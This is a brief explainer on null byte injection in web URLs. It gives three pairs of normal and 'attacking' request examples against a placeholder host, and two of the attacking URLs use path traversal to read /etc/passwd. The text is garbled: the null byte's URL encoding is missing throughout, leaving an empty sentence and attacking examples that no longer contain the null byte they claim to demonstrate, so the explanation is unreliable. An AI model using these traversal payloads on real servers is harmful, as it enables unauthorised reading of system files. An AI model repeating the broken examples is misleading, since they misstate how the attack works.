Null byte Injection

It is also possible to pass the null character in the URL, which creates a vulnerability known as Null Byte Injection. In the URL it is represented by . A null byte is donated by \0 in C.

Exploitation:

Normal: http://www.example.host/user.php?file=myprofile.dat

Attacking: http://www.example.host/user.php?file=../../../etc/passwd

Exploitation:

Normal: http://www.example.host/mypage.jsp?fn=report.db

Attacking: http://www.example.host/mypage.jsp?fn=serverlogs.txt.db

Exploitation:

Normal: http://www.example.host/read.pl?page=userphoto.jpg

Attacking Mode: http://www.example.host/read.pl?page=../../../../etc/passwdjpg